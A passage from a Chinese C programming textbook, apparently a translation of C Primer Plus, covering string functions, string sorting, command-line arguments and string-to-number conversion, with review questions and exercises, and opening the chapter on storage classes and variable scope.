前面提到过,参考资料V中列出了string.h系列的所有函数。除提供ANSI 标准要求的函数外,许多实现还提供一些其他函数。应查看你所使用的C实 现文档,了解可以使用哪些函数。 我们来看一下其中一个函数的简单用法。前面学过的fgets()读入一行输 入时,在目标字符串的末尾添加换行符。我们自定义的s_gets()函数通过 while循环检测换行符。其实,这里可以用strchr()代替s_gets()。首先,使用 strchr()查找换行符(如果有的话)。如果该函数发现了换行符,将返回该换 行符的地址,然后便可用空字符替换该位置上的换行符: char line[80]; char * find; fgets(line, 80, stdin); find = strchr(line, '\n'); // 查找换行符 if (find)           // 如果没找到换行符,返回NULL *find = '\0';     // 把该处的字符替换为空字符 如果strchr()未找到换行符,fgets()在达到行末尾之前就达到了它能读取 的最大字符数。可以像在s_gets()中那样,给if添加一个else来处理这种情 况。 接下来,我们看一个处理字符串的完整程序。 822 11.6 字符串示例:字符串排序 我们来处理一个按字母表顺序排序字符串的实际问题。准备名单表、创 建索引和许多其他情况下都会用到字符串排序。该程序主要是用 strcmp()函 数来确定两个字符串的顺序。一般的做法是读取字符串函数、排序字符串并 打印出来。之前,我们设计了一个读取字符串的方案,该程序就用到这个方 案。打印字符串没问题。程序使用标准的排序算法,稍后解释。我们使用了 一个小技巧,看看读者是否能明白。程序清单11.29演示了这个程序。 程序清单11.29 sort_str.c程序 /* sort_str.c -- 读入字符串,并排序字符串 */ #include <stdio.h> #include <string.h> #define SIZE 81    /* 限制字符串长度,包括 \0 */ #define LIM 20    /* 可读入的最多行数 */ #define HALT ""    /* 空字符串停止输入 */ void stsrt(char *strings [], int num); /* 字符串排序函数 */ char * s_gets(char * st, int n); int main(void) { char input[LIM][SIZE];   /* 储存输入的数组    */ char *ptstr[LIM];     /* 内含指针变量的数组  */ int ct 
= 0;        /* 输入计数      */ 823 int k;           /* 输出计数      */ printf("Input up to %d lines, and I will sort them.\n", LIM); printf("To stop, press the Enter key at a line's start.\n"); while (ct < LIM && s_gets(input[ct], SIZE) != NULL && input[ct][0] != '\0') { ptstr[ct] = input[ct]; /* 设置指针指向字符串  */ ct++; } stsrt(ptstr, ct);     /* 字符串排序函数    */ puts("\nHere's the sorted list:\n"); for (k = 0; k < ct; k++) puts(ptstr[k]);    /* 排序后的指针     */ return 0; } /* 字符串-指针-排序函数 */ void stsrt(char *strings [], int num) { char *temp; 824 int top, seek; for (top = 0; top < num - 1; top++) for (seek = top + 1; seek < num; seek++) if (strcmp(strings[top], strings[seek]) > 0) { temp = strings[top]; strings[top] = strings[seek]; strings[seek] = temp; } } char * s_gets(char * st, int n) { char * ret_val; int i = 0; ret_val = fgets(st, n, stdin); if (ret_val) { while (st[i] != '\n' && st[i] != '\0') i++; 825 if (st[i] == '\n') st[i] = '\0'; else while (getchar() != '\n') continue; } return ret_val; } 我们用一首童谣来测试该程序: Input up to 20 lines, and I will sort them. To stop, press the Enter key at a line's start. O that I was where I would be, Then would I be where I am not; But where I am I must be, And where I would be I can not. Here's the sorted list: And where I would be I can not. But where I am I must be, O that I was where I would be, 826 Then would I be where I am not; 看来经过排序后,这首童谣的内容未受影响。 11.6.1 排序指针而非字符串 该程序的巧妙之处在于排序的是指向字符串的指针,而不是字符串本 身。我们来分析一下具体怎么做。最初,ptrst[0]被设置为input[0],ptrst[1] 被设置为input[1],以此类推。这意味着指针ptrst[i]指向数组input[i]的首字 符。每个input[i]都是一个内含81个元素的数组,每个ptrst[i]都是一个单独的 变量。排序过程把ptrst重新排列,并未改变input。例如,如果按字母顺序 input[1]在intput[0]前面,程序便交换指向它们的指针(即ptrst[0]指向input[1] 的开始,而ptrst[1]指向input[0]的开始)。这样做比用strcpy()交换两个input 字符串的内容简单得多,而且还保留了input数组中的原始顺序。图11.6从另 一个视角演示了这一过程。 827 图11.6 排序字符串指针 11.6.2 选择排序算法 我们采用选择排序算法(selection sort algorithm)来排序指针。具体做 法是,利用for循环依次把每个元素与首元素比较。如果待比较的元素在当 前首元素的前面,则交换两者。循环结束时,首元素包含的指针指向机器排 序序列最靠前的字符串。然后外层for循环重复这一过程,这次从input的第2 个元素开始。当内层循环执行完毕时,ptrst中的第2个元素指向排在第2的字 符串。这一过程持续到所有元素都已排序完毕。 828 现在来进一步分析选择排序的过程。下面是排序过程的伪代码: for n = 首元素至 n = 倒数第2个元素, 找出剩余元素中的最大值,并将其放在第n个元素中 具体过程如下。首先,从n = 0开始,遍历整个数组找出最大值元素,那 该元素与第1个元素交换;然后设置n = 1,遍历除第1个元素以外的其他元 素,在其余元素中找出最大值元素,把该元素与第2个元素交换;重复这一 过程直至倒数第 2 个元素为止。现在只剩下两个元素。比较这两个元素,把 较大者放在倒数第2的位置。这样,数组中的最小元素就在最后的位置上。 这看起来用for循环就能完成任务,但是我们还要更详细地分析“查找和 放置”的过程。在剩余项中查找最大值的方法是,比较数组剩余元素的第1个 元素和第2个元素。如果第2个元素比第1个元素大,交换两者。现在比较数 组剩余元素的第1个元素和第3个元素,如果第3个元素比较大,交换两者。 每次交换都把较大的元素移至顶部。继续这一过程直到比较第 1 个元素和最 后一个元素。比较完毕后,最大值元素现在是剩余数组的首元素。已经排出 了该数组的首元素,但是其他元素还是一团糟。下面是排序过程的伪代码: for n - 第2个元素至最后一个元素, 比较第n个元素与第1个元素,如果第n个元素更大,交换这两个元素的 值 看上去用一个for循环也能搞定。只不过要把它嵌套在刚才的for循环 中。外层循环指明正在处理数组的哪一个元素,内层循环找出应储存在该元 素的值。把这两部分伪代码结合起来,翻译成 C代码,就得到了程序清单 11.29中的stsrt()函数。顺带一提,C库中有一个更高级的排序函数:qsort()。 该函数使用一个指向函数的指针进行排序比较。第16章将给出该函数的用法 示例。 829 11.7 ctype.h字符函数和字符串 第7章中介绍了ctype.h系列与字符相关的函数。虽然这些函数不能处理 整个字符串,但是可以处理字符串中的字符。例如,程序清单11.30中定义 的ToUpper()函数,利用toupper()函数处理字符串中的每个字符,把整个字符 串转换成大写;定义的 PunctCount()函数,利用 ispunct()统计字符串中的标 点符号个数。另外,该程序使用strchr()处理fgets()读入字符串的换行符(如 果有的话)。 程序清单11.30 mod_str.c程序 /* mod_str.c -- 修改字符串 */ #include <stdio.h> #include <string.h> #include <ctype.h> #define LIMIT 81 void ToUpper(char *); int PunctCount(const char *); int main(void) { char line[LIMIT]; char * find; puts("Please enter a line:"); fgets(line, LIMIT, stdin); 830 find = strchr(line, '\n'); // 查找换行符 if (find)        // 如果地址不是 NULL, *find = '\0';     // 用空字符替换 ToUpper(line); puts(line); printf("That line has %d punctuation characters.\n",  PunctCount(line)); return 0; } void ToUpper(char * str) { while (*str) { *str 
= toupper(*str); str++; } } int PunctCount(const char * str) { 831 int ct = 0; while (*str) { if (ispunct(*str)) ct++; str++; } return ct; } while (*str)循环处理str指向的字符串中的每个字符,直至遇到空字符。 此时*str的值为0(空字符的编码值为0),即循环条件为假,循环结束。下 面是该程序的运行示例: Please enter a line: Me? You talkin' to me? Get outta here! ME? YOU TALKIN' TO ME? GET OUTTA HERE! That line has 4 punctuation characters. ToUpper()函数利用toupper()处理字符串中的每个字符(由于C区分大小 写,所以这是两个不同的函数名)。根据ANSI C中的定义,toupper()函数只 改变小写字符。但是一些很旧的C实现不会自动检查大小写,所以以前的代 码通常会这样写: if (islower(*str)) /* ANSI C之前的做法 -- 在转换大小写之前先检查 */ 832 *str = toupper(*str); 顺带一提,ctype.h中的函数通常作为宏(macro)来实现。这些C预处理 器宏的作用很像函数,但是两者有一些重要的区别。我们在第16章再讨论关 于宏的内容。 该程序使用 fgets()和 strchr()组合,读取一行输入并把换行符替换成空字 符。这种方法与使用s_gets()的区别是:s_gets()会处理输入行剩余字符(如 果有的话),为下一次输入做好准备。而本例只有一条输入语句,就没必要 进行多余的步骤。 833 11.8 命令行参数 在图形界面普及之前都使用命令行界面。DOS和UNIX就是例子。Linux 终端提供类UNIX命令行环境。命令行(command line)是在命令行环境中, 用户为运行程序输入命令的行。假设一个文件中有一个名为fuss的程序。在 UNIX环境中运行该程序的命令行是: $ fuss 或者在Windows命令提示模式下是: C> fuss 命令行参数(command-line argument)是同一行的附加项。如下例: $ fuss -r Ginger 一个C程序可以读取并使用这些附加项(见图11.7)。 程序清单11.27是一个典型的例子,该程序通过main()的参数读取这些附 加项。 834 图11.7 命令行参数 程序清单11.31 repeat.c程序 /* repeat.c -- 带参数的 main() */ #include <stdio.h> int main(int argc, char *argv []) { int count; printf("The command line has %d arguments:\n", argc - 1); for (count = 1; count < argc; count++) printf("%d: %s\n", count, argv[count]); 835 printf("\n"); return 0; } 把该程序编译为可执行文件repeat。下面是通过命令行运行该程序后的 输出: C>repeat Resistance is futile The command line has 3 arguments: 1: Resistance 2: is 3: futile 由此可见该程序为何名为repeat。下面我们解释一下它的运行原理。 C编译器允许main()没有参数或者有两个参数(一些实现允许main()有更 多参数,属于对标准的扩展)。main()有两个参数时,第1个参数是命令行 中的字符串数量。过去,这个int类型的参数被称为argc (表示参数计数 (argument count))。系统用空格表示一个字符串的结束和下一个字符串的开 始。因此,上面的repeat示例中包括命令名共有4个字符串,其中后3个供 repeat使用。该程序把命令行字符串储存在内存中,并把每个字符串的地址 储存在指针数组中。而该数组的地址则被储存在 main()的第 2 个参数中。按 照惯例,这个指向指针的指针称为argv(表示参数值[argument value])。如 果系统允许(一些操作系统不允许这样),就把程序本身的名称赋给 argv[0],然后把随后的第1个字符串赋给argv[1],以此类推。在我们的例子 中,有下面的关系: argv[0] 指向 repeat (对大部分系统而言) 836 argv[1] 指向Resistance argv[2] 指向is argv[3] 指向futile 程序清单11.31的程序通过一个for循环依次打印每个字符串。printf()中 的%s转换说明表明,要提供一个字符串的地址作为参数,而指针数组中的 每个元素(argv[0]、argv[1]等)都是这样的地址。 main()中的形参形式与其他带形参的函数相同。许多程序员用不同的形 式声明argv: int main(int argc, char **argv) char **argv与char *argv[]等价。也就是说,argv是一个指向指针的指 针,它所指向的指针指向 char。因此,即使在原始定义中,argv 也是指向指 针(该指针指向 char)的指针。两种形式都可以使用,但我们认为第1种形 式更清楚地表明argv表示一系列字符串。 顺带一提,许多环境(包括UNIX和DOS)都允许用双引号把多个单词 括起来形成一个参数。例如: repeat "I am hungry" now 这行命令把字符串"I am hungry"赋给argv[1],把"now"赋给argv[2]。 11.8.1 集成环境中的命令行参数 Windows集成环境(如Xcode、Microsoft Visual C++和Embarcadero C++ Builder)都不用命令行运行程序。有些环境中有项目对话框,为特定项目指 定命令行参数。其他环境中,可以在IDE中编译程序,然后打开MS-DOS窗 口在命令行模式中运行程序。但是,如果你的系统有一个运行命令行的编译 器(如GCC)会更简单。 837 11.8.2 Macintosh中的命令行参数 如果使用Xcode 4.6(或类似的版本),可以在Product菜单中选择 Scheme选项来提供命令行参数,编辑Scheme,运行。然后选择Argument标 签,在Launch的Arguments Pass中输入参数。 或者进入Mac的Terminal模式和UNIX的命令行环境。然后,可以找到程 序可执行代码的目录(UNIX的文件夹),或者下载命令行工具,使用gcc或 clang编译程序。 838 11.9 把字符串转换为数字 数字既能以字符串形式储存,也能以数值形式储存。把数字储存为字符 串就是储存数字字符。例如,数字213以'2'、'1'、'3'、'\0'的形式被储存在字 符串数组中。以数值形式储存213,储存的是int类型的值。 C要求用数值形式进行数值运算(如,加法和比较)。但是在屏幕上显 示数字则要求字符串形式,因为屏幕显示的是字符。printf()和 sprintf()函 数,通过%d 和其他转换说明,把数字从数值形式转换为字符串形式, scanf()可以把输入字符串转换为数值形式。C 还有一些函数专门用于把字符 串形式转换成数值形式。 假设你编写的程序需要使用数值命令形参,但是命令形参数被读取为字 符串。因此,要使用数值必须先把字符串转换为数字。如果需要整数,可以 使用atoi()函数(用于把字母数字转换成整数),该函数接受一个字符串作 为参数,返回相应的整数值。程序清单11.32中的程序示例演示了该函数的 用法。 程序清单11.32 hello.c程序 /* hello.c -- 把命令行参数转换为数字 */ #include <stdio.h> #include <stdlib.h> int main(int argc, char *argv []) { int i, times; if (argc < 2 || (times = atoi(argv[1])) < 1) 839 printf("Usage: %s 
positive-number\n", argv[0]); else for (i = 0; i < times; i++) puts("Hello, good looking!"); return 0; } 该程序的运行示例: $ hello 3 Hello, good looking! Hello, good looking! Hello, good looking! $是UNIX和Linux的提示符(一些UNIX系统使用%)。命令行参数3被储 存为字符串3\0。atoi()函数把该字符串转换为整数值3,然后该值被赋给 times。该值确定了执行for循环的次数。 如果运行该程序时没有提供命令行参数,那么argc < 2为真,程序给出 一条提示信息后结束。如果times 为 0 或负数,情况也是如此。C 语言逻辑 运算符的求值顺序保证了如果 argc < 2,就不会对atoi(argv[1])求值。 如果字符串仅以整数开头,atio()函数也能处理,它只把开头的整数转 换为字符。例如, atoi("42regular")将返回整数42。如果在命令行输入hello what会怎样?在我们所用的C实现中,如果命令行参数不是数字,atoi()函数 返回0。然而C标准规定,这种情况下的行为是未定义的。因此,使用有错 误检测功能的strtol()函数(马上介绍)会更安全。 840 该程序中包含了stdlib.h头文件,因为从ANSI C开始,该头文件中包含 了atoi()函数的原型。除此之外,还包含了 atof()和 atol()函数的原型。atof() 函数把字符串转换成 double 类型的值, atol()函数把字符串转换成long类型 的值。atof()和atol()的工作原理和atoi()类似,因此它们分别返回double类型 和long类型。 ANSI C还提供一套更智能的函数:strtol()把字符串转换成long类型的 值,strtoul()把字符串转换成unsigned long类型的值,strtod()把字符串转换成 double类型的值。这些函数的智能之处在于识别和报告字符串中的首字符是 否是数字。而且,strtol()和strtoul()还可以指定数字的进制。 下面的程序示例中涉及strtol()函数,其原型如下: long strtol(const char * restrict nptr, char ** restrict endptr, int base); 这里,nptr是指向待转换字符串的指针,endptr是一个指针的地址,该 指针被设置为标识输入数字结束字符的地址,base表示以什么进制写入数 字。程序清单11.33演示了该函数的用法。 程序清单11.33 strcnvt.c程序 /* strcnvt.c -- 使用 strtol() */ #include <stdio.h> #include <stdlib.h> #define LIM 30 char * s_gets(char * st, int n); int main() { 841 char number[LIM]; char * end; long value; puts("Enter a number (empty line to quit):"); while (s_gets(number, LIM) && number[0] != '\0') { value = strtol(number, &end, 10); /* 十进制 */ printf("base 10 input, base 10 output: %ld, stopped at %s  (%d)\n", value, end, *end); value = strtol(number, &end, 16); /* 十六进制 */ printf("base 16 input, base 10 output: %ld, stopped at %s  (%d)\n", value, end, *end); puts("Next number:"); } puts("Bye!\n"); return 0; } char * s_gets(char * st, int n) 842 { char * ret_val; int i = 0; ret_val = fgets(st, n, stdin); if (ret_val) { while (st[i] != '\n' && st[i] != '\0') i++; if (st[i] == '\n') st[i] = '\0'; else while (getchar() != '\n') continue; } return ret_val; } 下面是该程序的输出示例: Enter a number (empty line to quit): 10 843 base 10 input, base 10 output: 10, stopped at (0) base 16 input, base 10 output: 16, stopped at (0) Next number: 10atom base 10 input, base 10 output: 10, stopped at atom (97) base 16 input, base 10 output: 266, stopped at tom (116) Next number: Bye! 
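顺带一提,如果还想检查转换结果是否超出long类型的表示范围,可以把strtol()与errno结合使用。下面是一个示意性片段(其中的str只是假设的输入字符串,错误处理方式也仅供参考,并非唯一写法):
/* 示意性片段:结合 errno 检测 strtol() 溢出 */
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
int main(void)
{
    const char * str = "99999999999999999999";  /* 假设的超长数字串 */
    char * end;
    long value;

    errno = 0;                      /* 调用前先清零 */
    value = strtol(str, &end, 10);
    if (errno == ERANGE)
        puts("Value out of range for long.");
    else if (end == str)
        puts("No digits were found.");
    else
        printf("value = %ld\n", value);
    return 0;
}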
首先注意,当base分别为10和16时,字符串"10"分别被转换成数字10和 16。还要注意,如果end指向一个字符,*end就是一个字符。因此,第1次转 换在读到空字符时结束,此时end指向空字符。打印end会显示一个空字符 串,以%d转换说明输出*end显示的是空字符的ASCII码。 对于第2个输入的字符串,当base为10时,end的值是'a'字符的地址。所 以打印end显示的是字符串"atom",打印*end显示的是'a'字符的ASCII码。然 而,当base为16时,'a'字符被识别为一个有效的十六进制数,strtol()函数把 十六进制数10a转换成十进制数266。 strtol()函数最多可以转换三十六进制,'a'~'z'字符都可用作数字。 strtoul()函数与该函数类似,但是它把字符串转换成无符号值。strtod()函数 只以十进制转换,因此它值需要两个参数。 许多实现使用 itoa()和 ftoa()函数分别把整数和浮点数转换成字符串。但 是这两个函数并不是 C标准库的成员,可以用sprintf()函数代替它们,因为 sprintf()的兼容性更好。 844 11.10 关键概念 许多程序都要处理文本数据。一个程序可能要求用户输入姓名、公司列 表、地址、一种蕨类植物的学名、音乐剧的演员等。毕竟,我们用言语与现 实世界互动,使用文本的例子不计其数。C 程序通过字符串的方式来处理它 们。 字符串,无论是由字符数组、指针还是字符串常量标识,都储存为包含 字符编码的一系列字节,并以空字符串结尾。C 提供库函数处理字符串,查 找字符串并分析它们。尤其要牢记,应该使用 strcmp()来代替关系运算符, 当比较字符串时,应该使用strcpy()或strncpy()代替赋值运算符把字符串赋给 字符数组。 845 11.11 本章小结 C字符串是一系列char类型的字符,以空字符('\0')结尾。字符串可以 储存在字符数组中。字符串还可以用字符串常量来表示,里面都是字符,括 在双引号中(空字符除外)。编译器提供空字符。因此,"joy"被储存为4个 字符j、o、y和\0。strlen()函数可以统计字符串的长度,空字符不计算在内。 字符串常量也叫作字符串——字面量,可用于初始化字符数组。为了容 纳末尾的空字符,数组大小应该至少比容纳的数组长度多1。也可以用字符 串常量初始化指向char的指针。 函数使用指向字符串首字符的指针来表示待处理的字符串。通常,对应 的实际参数是数组名、指针变量或用双引号括起来的字符串。无论是哪种情 况,传递的都是首字符的地址。一般而言,没必要传递字符串的长度,因为 函数可以通过末尾的空字符确定字符串的结束。 fgets()函数获取一行输入,puts()和 fputs()函数显示一行输出。它们都是 stdio.h 头文件中的函数,用于代替已被弃用的gets()。 C库中有多个字符串处理函数。在ANSI C中,这些函数都声明在string.h 文件中。C库中还有许多字符处理函数,声明在ctype.h文件中。 给main()函数提供两个合适的形式参数,可以让程序访问命令行参数。 第1个参数通常是int类型的argc,其值是命令行的单词数量。第2个参数通常 是一个指向数组的指针argv,数组内含指向char的指针。每个指向char的指 针都指向一个命令行参数字符串,argv[0]指向命令名称,argv[1]指向第1个 命令行参数,以此类推。 atoi()、atol()和atof()函数把字符串形式的数字分别转换成int、long 和 double类型的数字。strtol()、strtoul()和strtod()函数把字符串形式的数字分别 转换成long、unsigned long和double类型的数字。 846 11.12 复习题 复习题的参考答案在附录A中。 1.下面字符串的声明有什么问题? int main(void) { char name[] = {'F', 'e', 's', 's' }; ... } 2.下面的程序会打印什么? #include <stdio.h> int main(void) { char note[] = "See you at the snack bar."; char *ptr; ptr = note; puts(ptr); puts(++ptr); note[7] = '\0'; puts(note); 847 puts(++ptr); return 0; } 3.下面的程序会打印什么? #include <stdio.h> #include <string.h> int main(void) { char food [] = "Yummy"; char *ptr; ptr = food + strlen(food); while (--ptr >= food) puts(ptr); return 0; } 4.下面的程序会打印什么? #include <stdio.h> #include <string.h> int main(void) 848 { char goldwyn[40] = "art of it all "; char samuel[40] = "I read p"; const char * quote = "the way through."; strcat(goldwyn, quote); strcat(samuel, goldwyn); puts(samuel); return 0; } 5.下面的练习涉及字符串、循环、指针和递增指针。首先,假设定义了 下面的函数: #include <stdio.h> char *pr(char *str) { char *pc; pc = str; while (*pc) putchar(*pc++); do { 849 putchar(*--pc); } while (pc - str); return (pc); } 考虑下面的函数调用: x = pr("Ho Ho Ho!"); a.将打印什么? b.x是什么类型? c.x的值是什么? d.表达式*--pc是什么意思?与--*pc有何不同? e.如果用*--pc替换--*pc,会打印什么? f.两个while循环用来测试什么? g.如果pr()函数的参数是空字符串,会怎样? h.必须在主调函数中做什么,才能让pr()函数正常运行? 6.假设有如下声明: char sign = '$'; sign占用多少字节的内存?'$'占用多少字节的内存?"$"占用多少字节的 内存? 7.下面的程序会打印出什么? 850 #include <stdio.h> #include <string.h> #define M1 "How are ya, sweetie? " char M2[40] = "Beat the clock."; char * M3 = "chat"; int main(void) { char words[80]; printf(M1); puts(M1); puts(M2); puts(M2 + 1); strcpy(words, M2); strcat(words, " Win a toy."); puts(words); words[4] = '\0'; puts(words); while (*M3) puts(M3++); 851 puts(--M3); puts(--M3); M3 = M1; puts(M3); return 0; } 8.下面的程序会打印出什么? #include <stdio.h> int main(void) { char str1 [] = "gawsie"; char str2 [] = "bletonism"; char *ps; int i = 0; for (ps = str1; *ps != '\0'; ps++) { if (*ps == 'a' || *ps == 'e') putchar(*ps); else (*ps)--; 852 putchar(*ps); } putchar('\n'); while (str2[i] != '\0') { printf("%c", i % 3 ? 
str2[i] : '*'); ++i; } return 0; } 9.本章定义的s_gets()函数,用指针表示法代替数组表示法便可减少一个 变量i。请改写该函数。 10.strlen()函数接受一个指向字符串的指针作为参数,并返回该字符串 的长度。请编写一个这样的函数。 11.本章定义的s_gets()函数,可以用strchr()函数代替其中的while循环来 查找换行符。请改写该函数。 12.设计一个函数,接受一个指向字符串的指针,返回指向该字符串第1 个空格字符的指针,或如果未找到空格字符,则返回空指针。 13.重写程序清单11.21,使用ctype.h头文件中的函数,以便无论用户选 择大写还是小写,该程序都能正确识别答案。 853 11.13 编程练习 1.设计并测试一个函数,从输入中获取下n个字符(包括空白、制表 符、换行符),把结果储存在一个数组里,它的地址被传递作为一个参数。 2.修改并编程练习1的函数,在n个字符后停止,或在读到第1个空白、 制表符或换行符时停止,哪个先遇到哪个停止。不能只使用scanf()。 3.设计并测试一个函数,从一行输入中把一个单词读入一个数组中,并 丢弃输入行中的其余字符。该函数应该跳过第1个非空白字符前面的所有空 白。将一个单词定义为没有空白、制表符或换行符的字符序列。 4.设计并测试一个函数,它类似编程练习3的描述,只不过它接受第2个 参数指明可读取的最大字符数。 5.设计并测试一个函数,搜索第1个函数形参指定的字符串,在其中查 找第2个函数形参指定的字符首次出现的位置。如果成功,该函数返指向该 字符的指针,如果在字符串中未找到指定字符,则返回空指针(该函数的功 能与 strchr()函数相同)。在一个完整的程序中测试该函数,使用一个循环 给函数提供输入值。 6.编写一个名为is_within()的函数,接受一个字符和一个指向字符串的 指针作为两个函数形参。如果指定字符在字符串中,该函数返回一个非零值 (即为真)。否则,返回0(即为假)。在一个完整的程序中测试该函数, 使用一个循环给函数提供输入值。 7.strncpy(s1, s2, n)函数把s2中的n个字符拷贝至s1中,截断s2,或者有必 要的话在末尾添加空字符。如果s2的长度是n或多于n,目标字符串不能以空 字符结尾。该函数返回s1。自己编写一个这样的函数,名为mystrncpy()。在 一个完整的程序中测试该函数,使用一个循环给函数提供输入值。 8.编写一个名为string_in()的函数,接受两个指向字符串的指针作为参 数。如果第2个字符串中包含第1个字符串,该函数将返回第1个字符串开始 854 的地址。例如,string_in("hats", "at")将返回hats中a的地址。否则,该函数返 回空指针。在一个完整的程序中测试该函数,使用一个循环给函数提供输入 值。 9.编写一个函数,把字符串中的内容用其反序字符串代替。在一个完整 的程序中测试该函数,使用一个循环给函数提供输入值。 10.编写一个函数接受一个字符串作为参数,并删除字符串中的空格。 在一个程序中测试该函数,使用循环读取输入行,直到用户输入一行空行。 该程序应该应用该函数只每个输入的字符串,并显示处理后的字符串。 11.编写一个函数,读入10个字符串或者读到EOF时停止。该程序为用 户提供一个有5个选项的菜单:打印源字符串列表、以ASCII中的顺序打印字 符串、按长度递增顺序打印字符串、按字符串中第1个单词的长度打印字符 串、退出。菜单可以循环显示,除非用户选择退出选项。当然,该程序要能 真正完成菜单中各选项的功能。 12.编写一个程序,读取输入,直至读到 EOF,报告读入的单词数、大 写字母数、小写字母数、标点符号数和数字字符数。使用ctype.h头文件中的 函数。 13.编写一个程序,反序显示命令行参数的单词。例如,命令行参数是 see you later,该程序应打印later you see。 14.编写一个通过命令行运行的程序计算幂。第1个命令行参数是double 类型的数,作为幂的底数,第2个参数是整数,作为幂的指数。 15.使用字符分类函数实现atoi()函数。如果输入的字符串不是纯数字, 该函数返回0。 16.编写一个程序读取输入,直至读到文件结尾,然后把字符串打印出 来。该程序识别和实现下面的命令行参数: -p     按原样打印 855 -u     把输入全部转换成大写 -l     把输入全部转换成小写 如果没有命令行参数,则让程序像是使用了-p参数那样运行。 856 第12章 存储类别、链接和内存管理 本章介绍以下内容: 关键字:auto、extern、static、register、const、volatile、restricted、 _Thread_local、_Atomic 函数:rand()、srand()、time()、malloc()、calloc()、free() 如何确定变量的作用域(可见的范围)和生命期(它存在多长时间) 设计更复杂的程序 C语言能让程序员恰到好处地控制程序,这是它的优势之一。程序员通 过 C的内存管理系统指定变量的作用域和生命期,实现对程序的控制。合理 使用内存储存数据是设计程序的一个要点。 857 12.1 存储类别 C提供了多种不同的模型或存储类别(storage class)在内存中储存数 据。要理解这些存储类别,先要复习一些概念和术语。 本书目前所有编程示例中使用的数据都储存在内存中。从硬件方面来 看,被储存的每个值都占用一定的物理内存,C 语言把这样的一块内存称为 对象(object)。对象可以储存一个或多个值。一个对象可能并未储存实际 的值,但是它在储存适当的值时一定具有相应的大小(面向对象编程中的对 象指的是类对象,其定义包括数据和允许对数据进行的操作,C不是面向对 象编程语言)。 从软件方面来看,程序需要一种方法访问对象。这可以通过声明变量来 完成: int entity = 3; 该声明创建了一个名为entity的标识符(identifier)。标识符是一个名 称,在这种情况下,标识符可以用来指定(designate)特定对象的内容。标 识符遵循变量的命名规则(第2章介绍过)。在该例中,标识符entity即是软 件(即C程序)指定硬件内存中的对象的方式。该声明还提供了储存在对象 中的值。 变量名不是指定对象的唯一途径。考虑下面的声明: int * pt = &entity; int ranks[10]; 第1行声明中,pt是一个标识符,它指定了一个储存地址的对象。但 是,表达式*pt不是标识符,因为它不是一个名称。然而,它确实指定了一 个对象,在这种情况下,它与 entity 指定的对象相同。一般而言,那些指定 对象的表达式被称为左值(第5章介绍过)。所以,entity既是标识符也是左 858 值;*pt既是表达式也是左值。按照这个思路,ranks + 2 * entity既不是标识符 (不是名称),也不是左值(它不指定内存位置上的内容)。但是表达式* (ranks + 2 * entity)是一个左值,因为它的确指定了特定内存位置的值,即 ranks数组的第7个元素。顺带一提,ranks的声明创建了一个可容纳10个int类 型元素的对象,该数组的每个元素也是一个对象。 所有这些示例中,如果可以使用左值改变对象中的值,该左值就是一个 可修改的左值(modifiable lvalue)。现在,考虑下面的声明: const char * pc = "Behold a string literal!"; 程序根据该声明把相应的字符串字面量储存在内存中,内含这些字符值 的数组就是一个对象。由于数组中的每个字符都能被单独访问,所以每个字 符也是一个对象。该声明还创建了一个标识符为pc的对象,储存着字符串的 地址。由于可以设置pc重新指向其他字符串,所以标识符pc是一个可修改的 左值。const只能保证被pc指向的字符串内容不被修改,但是无法保证pc不指 向别的字符串。由于*pc指定了储存'B'字符的数据对象,所以*pc 是一个左 值,但不是一个可修改的左值。与此类似,因为字符串字面量本身指定了储 存字符串的对象,所以它也是一个左值,但不是可修改的左值。 可以用存储期(storage duration)描述对象,所谓存储期是指对象在内 存中保留了多长时间。标识符用于访问对象,可以用作用域(scope)和链 
接(linkage)描述标识符,标识符的作用域和链接表明了程序的哪些部分可 以使用它。不同的存储类别具有不同的存储期、作用域和链接。标识符可以 在源代码的多文件中共享、可用于特定文件的任意函数中、可仅限于特定函 数中使用,甚至只在函数中的某部分使用。对象可存在于程序的执行期,也 可以仅存在于它所在函数的执行期。对于并发编程,对象可以在特定线程的 执行期存在。可以通过函数调用的方式显式分配和释放内存。 我们先学习作用域、链接和存储期的含义,再介绍具体的存储类别。 12.1.1 作用域 859 作用域描述程序中可访问标识符的区域。一个C变量的作用域可以是块 作用域、函数作用域、函数原型作用域或文件作用域。到目前为止,本书程 序示例中使用的变量几乎都具有块作用域。块是用一对花括号括起来的代码 区域。例如,整个函数体是一个块,函数中的任意复合语句也是一个块。定 义在块中的变量具有块作用域(block scope),块作用域变量的可见范围是 从定义处到包含该定义的块的末尾。另外,虽然函数的形式参数声明在函数 的左花括号之前,但是它们也具有块作用域,属于函数体这个块。所以到目 前为止,我们使用的局部变量(包括函数的形式参数)都具有块作用域。因 此,下面代码中的变量 cleo和patrick都具有块作用域: double blocky(double cleo) { double patrick = 0.0; ... return patrick; } 声明在内层块中的变量,其作用域仅局限于该声明所在的块: double blocky(double cleo) { double patrick = 0.0; int i; for (i = 0; i < 10; i++) { 860 double q = cleo * i; // q的作用域开始 ... patrick *= q; }                // q的作用域结束 ... return patrick; } 在该例中,q的作用域仅限于内层块,只有内层块中的代码才能访问q。 以前,具有块作用域的变量都必须声明在块的开头。C99 标准放宽了这 一限制,允许在块中的任意位置声明变量。因此,对于for的循环头,现在 可以这样写: for (int i = 0; i < 10; i++) printf("A C99 feature: i = %d", i); 为适应这个新特性,C99把块的概念扩展到包括for循环、while循环、 do while循环和if语句所控制的代码,即使这些代码没有用花括号括起来, 也算是块的一部分。所以,上面for循环中的变量i被视为for循环块的一部 分,它的作用域仅限于for循环。一旦程序离开for循环,就不能再访问i。 函数作用域(function scope)仅用于goto语句的标签。这意味着即使一 个标签首次出现在函数的内层块中,它的作用域也延伸至整个函数。如果在 两个块中使用相同的标签会很混乱,标签的函数作用域防止了这样的事情发 生。 函数原型作用域(function prototype scope)用于函数原型中的形参名 861 (变量名),如下所示: int mighty(int mouse, double large); 函数原型作用域的范围是从形参定义处到原型声明结束。这意味着,编 译器在处理函数原型中的形参时只关心它的类型,而形参名(如果有的话) 通常无关紧要。而且,即使有形参名,也不必与函数定义中的形参名相匹 配。只有在变长数组中,形参名才有用: void use_a_VLA(int n, int m, ar[n][m]); 方括号中必须使用在函数原型中已声明的名称。 变量的定义在函数的外面,具有文件作用域(file scope)。具有文件作 用域的变量,从它的定义处到该定义所在文件的末尾均可见。考虑下面的例 子: #include <stdio.h> int units = 0;    /* 该变量具有文件作用域 */ void critic(void); int main(void) { ... } void critic(void) { ... 862 } 这里,变量units具有文件作用域,main()和critic()函数都可以使用它 (更准确地说,units具有外部链接文件作用域,稍后讲解)。由于这样的变 